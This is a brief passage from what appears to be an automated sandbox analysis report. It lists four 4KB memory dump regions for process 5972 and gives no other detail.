                                    4KB

                                  • memory/5972-87-0x00000231D21B0000-0x00000231D21B1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/5972-86-0x00000231D21B0000-0x00000231D21B1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/5972-81-0x00000231D21B0000-0x00000231D21B1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/5972-82-0x00000231D21B0000-0x00000231D21B1000-memory.dmp

                                    Filesize

                                    4KB